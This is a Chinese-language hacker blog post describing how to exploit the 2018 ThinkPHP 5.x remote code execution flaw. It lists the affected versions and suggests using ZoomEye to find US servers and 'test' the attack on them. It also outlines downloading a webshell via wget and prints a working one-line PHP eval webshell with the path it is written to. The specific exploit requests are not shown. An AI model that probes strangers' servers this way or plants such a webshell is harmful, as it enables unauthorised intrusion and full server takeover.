Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
adminAdmin  2018-12-11 17:13 lsh4ck's Blog 隐藏边栏 |   抢沙发  517 
文章评分 1 次,平均分 5.0

近日 thinkphp 团队发布了版本更新 https://blog.thinkphp.cn/869075,其中修复了一处 getshell 漏洞。

官网论坛随即放出神级求助帖【求助!thinkphp5.0.9 执行系统代码漏洞】

影响版本

ThinkPHP 5.x < 5.1.31, <= 5.0.23

漏洞概述

ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执 行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在 没有开启强制路由的情况下可能的 getshell 漏洞。

漏洞验证

zoomeye 搜索“你值得信赖的 PHP 框架 +country:"US"“。搜索美国目标测试一波。

写 shell 的 exp:

利用该漏洞远程执行下载命令,通过 wget 远程下载一个 webshell 后门,执行命令从而获得服务器权限:

利用 file_get_contents 和 file_put_contents 函数,远程下载 webshell:

利用 file_put_contents 函数 写入一句话 webshell,其攻击的 URI 详情如下:

该命令行包含的 base64 加密字符串解码如下:

"<?php $pass=$_POST['360very'];eval($pass);?>"

该恶意代码将被写入到文件./vendor/autoclass.php 中



  

本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

admin
Admin 关注:0    粉丝:4 最后编辑于:2019-01-23
这个人很懒,什么都没写

发表评论

表情 链接 私密 格式 签到

切换注册

登录

短信快捷登录 忘记密码 ?

切换登录

注册

验证码

×

感谢您对admin的支持,么么哒~

支付宝打赏 admin
请扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

lsh4ck's Blog - Hacking is endless! Focus on network security!

扫一扫二维码分享

无觅相关文章插件,快速提升流量